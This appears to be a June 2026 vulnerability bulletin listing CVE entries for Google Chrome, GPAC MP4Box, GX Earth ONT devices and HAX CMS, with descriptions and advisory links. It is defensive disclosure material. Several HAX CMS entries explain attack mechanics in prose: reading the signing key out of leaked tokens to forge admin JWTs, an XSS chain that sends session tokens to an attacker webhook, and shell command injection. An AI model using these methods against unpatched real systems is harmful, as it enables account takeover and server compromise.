| Google--Chrome | Inappropriate implementation in Permissions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11254 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498405554 |
| Google--Chrome | Insufficient validation of untrusted input in Storage Access API in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11255 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498417152 |
| Google--Chrome | Integer overflow in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11256 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498856565 |
| Google--Chrome | Inappropriate implementation in Browser in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11257 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499051898 |
| Google--Chrome | Inappropriate implementation in File System Access in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11258 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499078161 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11259 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499215943 |
| Google--Chrome | Inappropriate implementation in Permissions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11260 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499257860 |
| Google--Chrome | Inappropriate implementation in PDF in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11261 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499262832 |
| Google--Chrome | Use after free in TabStrip in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11262 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499386363 |
| Google--Chrome | Insufficient policy enforcement in WebAuthentication in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11263 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500044225 |
| Google--Chrome | Policy bypass in Content Security Policy in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11264 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500099106 |
| Google--Chrome | Inappropriate implementation in Autofill in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11265 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500262869 |
| Google--Chrome | Inappropriate implementation in SafeBrowsing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass Safe Browsing via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11266 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500521311 |
| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass content security policy via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11267 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500528267 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11268 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500528706 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker in a privileged network position to execute arbitrary code inside a sandbox via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11269 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500551122 |
| Google--Chrome | Inappropriate implementation in UI in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11270 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501504245 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11271 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501685207 |
| Google--Chrome | Insufficient validation of untrusted input in Reading List in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11272 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501747321 |
| Google--Chrome | Insufficient validation of untrusted input in Omnibox in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11273 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501757688 |
| Google--Chrome | Inappropriate implementation in DOM Distiller in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11274 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501760514 |
| Google--Chrome | Inappropriate implementation in Page Info in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11275 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501763121 |
| Google--Chrome | Inappropriate implementation in Cast in Google Chrome prior to 149.0.7827.53 allowed an attacker on the local network segment to bypass discretionary access control via malicious network traffic. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11276 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501780338 |
| Google--Chrome | Insufficient policy enforcement in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11277 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501839664 |
| Google--Chrome | Inappropriate implementation in CustomTabs in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11278 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501859865 |
| Google--Chrome | Out of bounds read in DevTools in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11279 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501878477 |
| Google--Chrome | Inappropriate implementation in Signin in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11280 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501892820 |
| Google--Chrome | Integer overflow in Chromoting in Google Chrome on Windows prior to 149.0.7827.53 allowed a local attacker to obtain potentially sensitive information from process memory via a crafted ETW event. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11281 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501900366 |
| Google--Chrome | Insufficient policy enforcement in Sandbox in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11282 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502023400 |
| Google--Chrome | Insufficient validation of untrusted input in Shortcuts in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11283 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502069297 |
| Google--Chrome | Side-channel information leakage in PerformanceAPIs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11284 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502073069 |
| Google--Chrome | Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11285 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502090914 |
| Google--Chrome | Insufficient validation of untrusted input in Wallet in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11286 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502110170 |
| Google--Chrome | Insufficient policy enforcement in Navigation in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11287 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502173136 |
| Google--Chrome | Insufficient policy enforcement in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11288 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502231588 |
| Google--Chrome | Side-channel information leakage in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11289 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502239897 |
| Google--Chrome | Integer overflow in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to cause a denial of service via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11290 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502264647 |
| Google--Chrome | Inappropriate implementation in Android Autofill in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11291 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502346855 |
| Google--Chrome | Insufficient policy enforcement in Blink in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11292 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502358901 |
| Google--Chrome | Use after free in Input in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11293 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502362260 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11294 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502403953 |
| Google--Chrome | Inappropriate implementation in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11295 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502444677 |
| Google--Chrome | Inappropriate implementation in ImageCapture in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11296 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502493950 |
| Google--Chrome | Insufficient validation of untrusted input in Reader Mode in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to bypass navigation restrictions via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11297 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502502017 |
| Google--Chrome | Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11298 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502503860 |
| Google--Chrome | Integer overflow in Fonts in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11299 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502598424 |
| Google--Chrome | Inappropriate implementation in Permissions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11300 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503614310 |
| Google--Chrome | Inappropriate implementation in LiveCaption in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via malicious network traffic. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11301 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504180386 |
| Google--Chrome | Insufficient policy enforcement in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11302 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504196549 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11303 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504416752 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11304 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504418475 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11305 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504545544 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11306 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504548949 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11307 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504551617 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to perform privilege escalation via a crafted Chrome Extension. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11308 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505945112 |
| Google--Chrome | Insufficient policy enforcement in History in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11309 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506392934 |
| GPAC--MP4Box | A heap buffer overflow in the m2tsdmx_send_packet function (filters/dmx_m2ts.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-01 | not yet calculated | CVE-2025-55664 | https://github.com/gpac/gpac/issues/3310 https://github.com/gpac/gpac/commit/9bd6a72c9efc0513dfd33b87498afc7658dabd26 https://infosec.exchange/@sigdevel/116659245751279377 |
| GPAC--MP4Box | A NULL pointer dereference in the gf_odf_ac4_cfg_dsi_v1 function (/odf/descriptors.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted AC4 file. | 2026-06-01 | not yet calculated | CVE-2025-60481 | https://github.com/gpac/gpac/commit/e02d1fd24cdc26acb1b236ab38b3832cffcae21b https://github.com/gpac/gpac/issues/3296 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/45/README.md https://infosec.exchange/@sigdevel/116659159345966316 |
| GPAC--MP4Box | A NULL pointer dereference in the gf_ac4_pres_b_4_back_channels_present function (/media_tools/av_parsers.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted AC4 file. | 2026-06-01 | not yet calculated | CVE-2025-60483 | https://github.com/gpac/gpac/commit/13eb5b76560aaf7813b865a2ad433258478e2695 https://github.com/gpac/gpac/issues/3302 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/49/README.md https://infosec.exchange/@sigdevel/116659111520602254 |
| GPAC--MP4Box | A segmentation violation in the gf_isom_apple_set_tag_ex function (/isomedia/isom_write.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-01 | not yet calculated | CVE-2025-60485 | https://github.com/gpac/gpac/issues/3323 https://github.com/gpac/gpac/commit/4860a1a6f128ccc9ae37b4b738d22029f9672457 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/52/README.md https://infosec.exchange/@sigdevel/116662498332150083 |
| GPAC--MP4Box | A heap use-after-free in the dasher_process function (/filters/dasher.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MPEG-2 file. | 2026-06-01 | not yet calculated | CVE-2025-60486 | https://github.com/gpac/gpac/commit/e6d01820d7bf3967d931fedb379ee5f209bc133b https://github.com/gpac/gpac/issues/3314 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/53/README.md https://infosec.exchange/@sigdevel/116662544397024289 |
| GPAC--MP4Box | A segmentation violation in the gf_media_get_color_info function (/media_tools/isom_tools.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted data file. | 2026-06-01 | not yet calculated | CVE-2025-60495 | https://github.com/gpac/gpac/issues/3335 https://github.com/gpac/gpac/commit/9beed3c0a2f38505c745e5376234e7ed66e8e0b1 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/66/README.md https://infosec.exchange/@sigdevel/116659058320692913 |
| GPAC--MP4Box | A NULL pointer dereference in the gf_filter_pid_resolve_file_template_ex function (/filter_core/filter_pid.c) of GPAC Project/MP4Box before 26.02.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted file. | 2026-06-03 | not yet calculated | CVE-2025-60477 | https://github.com/gpac/gpac/issues/3301 https://github.com/gpac/gpac/commit/13eb5b76560aaf7813b865a2ad433258478e2695 https://github.com/sigdevel/pocs/blob/main/res/gpac/MP4Box/48/README.md https://infosec.exchange/@sigdevel/116658486442433074 |
| GX INDIA--GX Earth 2022 | This vulnerability exists in GX Earth ONT models due to improper handling of user-supplied input in multiple diagnostic functions in its web management interface. An authenticated remote attacker could exploit this vulnerability by injecting arbitrary and executing OS commands on the targeted device. Successful exploitation of this vulnerability could allow the attacker to perform remote code execution with root privileges on the targeted device. | 2026-06-04 | not yet calculated | CVE-2026-45431 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0288 |
| GX INDIA--GX Earth 2022 | This vulnerability exists in GX Earth ONT models due to the transmission of user credentials in plaintext over HTTP in its web management interface. A remote attacker could exploit this vulnerability by intercepting network traffic to obtain sensitive authentication information, which could lead to unauthorized access to the targeted device. | 2026-06-04 | not yet calculated | CVE-2026-45432 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0288 |
| GX INDIA--GX Earth 2022 | This vulnerability exists in GX Earth 2022 ONT models due to the presence of hardcoded RSA private key within the device firmware. A remote attacker could exploit this vulnerability by extracting the cryptographic private key from the firmware, which could lead to decryption of HTTPS traffic and Man-in-the-Middle (MITM) attacks on the targeted device. | 2026-06-04 | not yet calculated | CVE-2026-45433 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0288 |
| haxtheweb--@haxtheweb/open-apis | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Starting in version 9.0.1 and prior to version 26.0.0 of @haxtheweb/open-apis, multiple functions conduct substring-only matching to validate hostnames to which basic authorization should be sent. An attacker can append the matched substrings to an attacker-controlled endpoint and capture authentication. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46391 | https://github.com/haxtheweb/issues/security/advisories/GHSA-4fg7-f244-3j49 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. An authenticated Server-Side Request Forgery (SSRF) vulnerability in versions prior to 26.0.0 allows authenticated users to fetch arbitrary internal or local resources and write the responses to a web-accessible directory, enabling arbitrary file read and internal network access. Version 26.0.0 contains a fix. | 2026-06-05 | not yet calculated | CVE-2026-46393 | https://github.com/haxtheweb/issues/security/advisories/GHSA-q862-gcgq-5m6g |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, the `hmacBase64()` function in the HAXcms Node.js backend contains two critical cryptographic implementation errors that together allow any unauthenticated attacker to extract the system's private signing key and forge arbitrary admin-level JSON Web Tokens (JWTs) allowing them to get full admin access with a single HTTP request. First, the function passes the literal string "0" as the HMAC signing key instead of the key parameter, making every HAXcms instance compute identical HMACs for the same input. Then, after computing the HMAC, the function concatenates the real key parameter which is "this.privateKey + this.salt", the system's master signing secret is directly onto the output. The combined buffer is base64-encoded and returned as the token. Every base64url token produced has the same structure: 32 bytes HMAC keyed with "0" and N bytes of `privateKey+salt`. An attacker base64-decodes any token, discards the first 32 bytes, and reads the private key directly. The `/system/api/connectionSettings` endpoint is unauthenticated and returns multiple tokens generated by this function. A single GET request to this endpoint exposes the private key. The PHP backend implements this function correctly with the actual key and returns only the hash. The PHP version produces 44-character tokens whereas the broken Node.js version produces 139+ character tokens. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46395 | https://github.com/haxtheweb/issues/security/advisories/GHSA-6c8g-9hfh-pq5h |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 26.0.0 due to improper sanitization of `<iframe>` elements. The application allows `javascript:` URIs in the `src` attribute, which are executed when a malicious page is viewed. This enables attackers to execute arbitrary JavaScript in the context of the victim's browser and access sensitive data exposed to client-side scripts. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46396 | https://github.com/haxtheweb/issues/security/advisories/GHSA-jh3h-rpxg-fr36 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. The PHP version of HAX CMS prior to version 26.0.0 has an authenticated file overwrite vulnerability. An attacker can exploit this vulnerability to configure malicious Git filter commands and achieve code execution on the HAX CMS server. Version 26.0.0 patches the issue. | 2026-06-05 | not yet calculated | CVE-2026-46399 | https://github.com/haxtheweb/issues/security/advisories/GHSA-q759-vxg8-vq5j |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 26.0.0 due to improper sanitization of the `<video-player>` component. The component allows `javascript:` URIs in the `source` attribute, which are executed when the page is viewed. This enables attackers to execute arbitrary JavaScript in the context of the victim's browser and access sensitive data such as JWT tokens and more. Version 26.0.0 fixes the issue. | 2026-06-05 | not yet calculated | CVE-2026-46496 | https://github.com/haxtheweb/issues/security/advisories/GHSA-2m6p-hm3w-6jm3 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, an attack chain utilizing Stored XSS alongside dynamic token exposure in the `/system/api/connectionSettings` endpoint allows an authenticated attacker to perform a complete cross-tenant account takeover. The API dynamically leaks the active session's authentication tokens (including the `jwt`, `user_token`, `site_token`, and `appstore_token`) into a global JavaScript variable (`window.appSettings`). An attacker can exploit the XSS vulnerability to force a victim's browser to silently fetch their specific connection settings, extract the tokens, and exfiltrate them to an attacker-controlled webhook. Version 26.0.0 patches the issue. | 2026-06-05 | not yet calculated | CVE-2026-46511 | https://github.com/haxtheweb/issues/security/advisories/GHSA-x3x5-7h4h-gwxg |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Starting in version 2.0.0 and prior to version 26.0.0, the gitlist plugin is exposed to unauthenticated users, allowing unauthenticated browsing of git repositories and git history. Version 26.0.0 patches the issue. | 2026-06-05 | not yet calculated | CVE-2026-46390 | https://github.com/haxtheweb/issues/security/advisories/GHSA-6434-8rch-w65c |
| haxtheweb--haxcms-php | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Prior to version 26.0.0, an OS command injection vulnerability exists in the Git.php library of the HAXcms PHP backend. The application constructs shell command strings using unsanitized input and executes them via proc_open(). An attacker who can control parameters passed into Git operations can execute arbitrary OS commands with the privileges of the web server. Out of 17 functions that invoke shell commands only 1 function (`commit()`) correctly uses `escapeshellarg()`. When combined with another vulnerability that allows configuration manipulation, this issue can lead to full remote code execution and complete system compromise. Version 26.0.0 patches the issue. | 2026-06-05 | not yet calculated | CVE-2026-46394 | https://github.com/haxtheweb/issues/security/advisories/GHSA-6jf3-9fgh-cmfr |
